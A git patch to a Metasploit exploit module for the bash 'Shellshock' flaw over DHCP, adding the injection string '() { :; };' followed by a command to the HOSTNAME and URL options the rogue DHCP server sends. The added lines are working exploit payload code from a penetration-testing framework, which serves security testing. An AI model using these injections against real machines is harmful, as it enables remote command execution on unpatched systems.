From 54e67639906e82390912568daaeefe76cd5e23da Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 26 Sep 2014 10:13:24 -0500
Subject: [PATCH] Add injection to HOSTNAME and URL

---
 modules/exploits/unix/dhcp/bash_environment.rb | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/modules/exploits/unix/dhcp/bash_environment.rb b/modules/exploits/unix/dhcp/bash_environment.rb
index 41cab18385..dd102c1f5c 100644
--- a/modules/exploits/unix/dhcp/bash_environment.rb
+++ b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -70,6 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote
     if hash['DOMAINNAME'].length > 255
       raise ArgumentError, 'payload too long'
     end
+
+    hash['HOSTNAME'] = "() { :; };#{echo}"
+    hash['URL'] = "() { :; };#{echo}"
     start_service(hash)
 
     begin